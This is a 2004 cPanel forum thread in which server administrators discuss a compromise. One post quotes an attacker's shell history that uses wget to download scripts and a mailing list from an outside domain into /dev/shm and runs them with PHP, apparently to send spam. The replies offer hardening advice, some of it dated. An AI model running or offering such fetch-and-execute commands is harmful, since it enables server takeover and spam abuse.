The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

tmp shm hack

Discussion in 'General Discussion' started by Michael-MS, Dec 11, 2004.

  1. Michael-MS

    Michael-MS Well-Known Member

    Joined:
    Apr 16, 2003
    Messages:
    144
    Likes Received:
    0
    Trophy Points:
    16
    This is from .bash_history in /tmp. Any idea how to stop this???

    Code:
    
    cd /dev/shm
    ls
    mkdir st
    ls
    cd st
    wget promocoesnatal.com/enviar.txt
    wget promocoesnatal.com/cinema.htm
    wget promocoesnatal.com/lista04.txt
    ls
    php -q enviar.txt lista04.txt cinema.htm
    
    
    Thanks,
    Michael
     
  2. Etheral

    Etheral Well-Known Member

    Joined:
    Dec 8, 2003
    Messages:
    208
    Likes Received:
    0
    Trophy Points:
    16
  3. EdRooney

    EdRooney BANNED

    Joined:
    Oct 21, 2004
    Messages:
    166
    Likes Received:
    0
    Trophy Points:
    0
    he said they are going to /dev/shm not /tmp

    Search the apache logs, someone is running a vulnerable script.
     
  4. linux-image

    linux-image Well-Known Member

    Joined:
    Jun 8, 2004
    Messages:
    1,192
    Likes Received:
    1
    Trophy Points:
    38
    Location:
    India
    cPanel Access Level:
    Root Administrator
  5. SupermanInNY

    SupermanInNY Well-Known Member

    Joined:
    Jul 19, 2003
    Messages:
    255
    Likes Received:
    0
    Trophy Points:
    16
    In my php.ini I've entered the following functions to the disabled list and stoped that exploit cold.
    The phpBB fix was also implemented, but just changing the php.ini with those values stoped the problem immediatly.



    disable_functions = readfile, system, passthru ; This directive allows you to disable certain
    ;functions for security reasons. It receives
    ; a comma separated list of function names.
    ; This directive is *NOT* affected by whether
    ; Safe Mode is turned on or off.


    I strongly suggest modifying your php.ini to have those entries.

    -Alon.
     
  6. kaelin

    kaelin Member

    Joined:
    Jun 6, 2003
    Messages:
    7
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    Texas USA
    enviar.txt

    I cannot believe this is the only post on this - this has happened multiple times and some new hole gets discovered after we have closed the "existing" one - maybe people just don't it's happening to them? If you are blackholed and you are not a spammer maybe this is while - maybe if you aren't like me and don't get root mail and suddenly get blasted with thousands of rejects from the (words I will not post on what these people are) "jerks" who do this to send their spam through your server - alerting us to the fact that it has "happened" again.

    I searched for enviar.txt and this is the only thing returned - so if there are more threads - please point me their way :)


    My tech partner used the fix that is in this small post after this started again yesterday - and lo and behold it happened again this morning.

    If someone has TRULY successfully stopped this I would appreciate knowing - other than disallowing wget entirely on the server (which I use because I'm on dialup in the boonies and it kills my productive time having to upload and download) - I would love to know.

    I'm sure not a vindicitve person, nor one who wishes harm to others, but I can honestly say - if anyone figures out a way to blow these people's computers out when they hack and steal from others - I'd love to see it - I'd sell tickets and popcorn.
     
  7. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    There are plenty of threads, it's more a matter of searching for the right thing. You're most likely being compromised through a vulnerable PHP script. So, search these forums to learn how to:

    1. Make sure that you have all of your phpBB forums upgraded to v2.13

    2. Install mod_security and use a strong set of filters

    3. Mount /dev/shm noexec,nosuid

    4. Make sure that you have a firewall installed (iptables if you're on Linux)

    5. Clean your server if it has been compromised and check for rookit exploits

    6. Make sure that you're running php v4.3.10 and if possble enable phpsuexec

    You can get all that information from the forums and/or you can hire someone to do them for you if you don't have the time.
     
  8. kaelin

    kaelin Member

    Joined:
    Jun 6, 2003
    Messages:
    7
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    Texas USA
    Thank you Chirpy

    I searched for enviar.txt - since that is the common thread I've seen - but thank you - I'll look and see what I can find.
     
Loading...

Share This Page